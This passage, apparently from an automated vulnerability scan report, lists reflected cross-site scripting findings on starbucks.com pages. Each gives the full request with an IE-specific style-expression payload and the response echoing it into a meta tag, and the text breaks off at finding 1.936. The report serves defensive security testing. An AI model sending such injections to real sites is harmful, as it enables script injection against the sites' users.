<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/cocoa?649df"style="x:expression(alert(1))"f64e12d5982=1"/>
...[SNIP]...

1.922. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4ba4"style="x:expression(alert(1))"aa5721e012a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/coffee?c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:09 GMT
Connection: close
Content-Length: 40989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/coffee?c4ba4"style="x:expression(alert(1))"aa5721e012a=1"/>
...[SNIP]...

1.923. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/farmer-support

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57860"style%3d"x%3aexpression(alert(1))"35fa26ea488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57860"style="x:expression(alert(1))"35fa26ea488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/farmer-support?57860"style%3d"x%3aexpression(alert(1))"35fa26ea488=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:45 GMT
Connection: close
Content-Length: 39451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/farmer-support?57860"style="x:expression(alert(1))"35fa26ea488=1"/>
...[SNIP]...

1.924. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/store-products

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c42"style%3d"x%3aexpression(alert(1))"3279581907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c42"style="x:expression(alert(1))"3279581907e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/store-products?a4c42"style%3d"x%3aexpression(alert(1))"3279581907e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:32 GMT
Connection: close
Content-Length: 38439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/store-products?a4c42"style="x:expression(alert(1))"3279581907e=1"/>
...[SNIP]...

1.925. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3bf3"style="x:expression(alert(1))"a81c545b7d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/tea?d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:08 GMT
Connection: close
Content-Length: 37019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/tea?d3bf3"style="x:expression(alert(1))"a81c545b7d9=1"/>
...[SNIP]...

1.926. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/wellness

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7967c"style%3d"x%3aexpression(alert(1))"1b512706177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7967c"style="x:expression(alert(1))"1b512706177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/wellness?7967c"style%3d"x%3aexpression(alert(1))"1b512706177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:56 GMT
Connection: close
Content-Length: 41668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/wellness?7967c"style="x:expression(alert(1))"1b512706177=1"/>
...[SNIP]...

1.927. http://www.starbucks.com/search [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 was submitted in the keywords parameter. This input was echoed as a5e7f"style="x:expression(alert(1))"ea56a668f54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:39 GMT
Content-Length: 34084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='a5e7f"style="x:expression(alert(1))"ea56a668f54"/>
...[SNIP]...

1.928. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe12b"style="x:expression(alert(1))"ef4935acaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:48 GMT
Content-Length: 33998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&fe12b"style="x:expression(alert(1))"ef4935acaa=1"/>
...[SNIP]...

1.929. http://www.starbucks.com/search/ [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 was submitted in the keywords parameter. This input was echoed as 88b3a"style="x:expression(alert(1))"e0f4f9251b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?keywords=88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:20 GMT
Connection: close
Content-Length: 34078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords=88b3a"style="x:expression(alert(1))"e0f4f9251b1"/>
...[SNIP]...

1.930. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ed55"style="x:expression(alert(1))"89be0e08a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:44 GMT
Connection: close
Content-Length: 33719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?5ed55"style="x:expression(alert(1))"89be0e08a98=1"/>
...[SNIP]...

1.931. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b04"style="x:expression(alert(1))"eea619f23d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /site-map?66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:07 GMT
Connection: close
Content-Length: 92906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/site-map?66b04"style="x:expression(alert(1))"eea619f23d6=1"/>
...[SNIP]...

1.932. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62425"style%3d"x%3aexpression(alert(1))"fa95c58147d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62425"style="x:expression(alert(1))"fa95c58147d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /smooth?62425"style%3d"x%3aexpression(alert(1))"fa95c58147d=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=tok1t2g1e4xui3idmv3cq43q; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:39 GMT
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?62425"style="x:expression(alert(1))"fa95c58147d=1"/>
...[SNIP]...

1.933. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79d22"style="x:expression(alert(1))"59609b14b2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smooth/?79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:29:16 GMT
Connection: close
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?79d22"style="x:expression(alert(1))"59609b14b2a=1"/>
...[SNIP]...

1.934. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8188"style="x:expression(alert(1))"8d18f2f6526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store-locator?d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:22 GMT
Connection: close
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/store-locator?d8188"style="x:expression(alert(1))"8d18f2f6526=1"/>
...[SNIP]...

1.935. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff0ed"style="x:expression(alert(1))"b9ac111388f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:48 GMT
Connection: close
Content-Length: 46436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?ff0ed"style="x:expression(alert(1))"b9ac111388f=1"/>
...[SNIP]...

1.936. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /card/set-auto-reload

Issue detail

